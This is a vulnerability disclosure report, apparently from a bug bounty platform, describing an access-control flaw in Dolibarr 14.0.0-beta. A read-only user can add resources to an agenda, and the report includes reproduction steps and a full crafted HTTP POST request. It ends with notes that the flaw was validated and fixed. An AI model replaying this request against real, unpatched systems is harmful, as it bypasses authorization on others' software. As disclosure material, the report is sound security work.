Improper Privilege Management in dolibarr/dolibarr

Valid

Reported on

May 23rd 2021


💥 BUG

unprivileged user can add resource to a agenda

💥 IMPACT

user with read-only permission can add resource agenda

💥 TESTED VERSION

dolibarr 14.0.0-beta

💥 STEP TO REPRODUCE

1. First goto admin account and add user B as normal user .
Now give user B bellow permission for Events/Agenda and Resource module .

Events/Agenda-->Read actions (events or tasks) linked to his user account (if owner of event or just assigned to)
Resources-->Read resources

So, user B can see agenda assigned to him as contributor but cant modify .

2. Now from admin account goto Agenda module and create a Agenda .
Now admin add user B to this agenda as contributor.

3. Finally goto user B account and here user B can see agenda but cant edit agenda .
But user B can add resource to this Agenda with bellow request .

POST /dolibarr-develop/htdocs/resource/element_resource.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 194
Origin: http://localhost
Connection: close
Referer: http://localhost/dolibarr-develop/htdocs/resource/element_resource.php?element=action&element_id=2
Cookie: DOLINSTALLNOPING_ec41f89b17787dd4c217ae49b23f4604=0; DOLSESSID_8e8881ad773ee74880c453666c22c288=os0ama6kpuv1qvtr24r0rrj13d
Upgrade-Insecure-Requests: 1

token=%242y%2410%24lrTA2V6GCCXJa5wD0RixsuZbRCcD1wVg4wdoADT6EUr1D6vRggj%2Fm&action=add_element_resource&element=action&element_id=2&ref=&resource_type=dolresource&fk_resource=1&busy=1&mandatory=0

Laurent Destailleur validated this vulnerability a month ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
Laurent Destailleur confirmed that a fix has been merged on 02632e a month ago
Laurent Destailleur has been awarded the fix bounty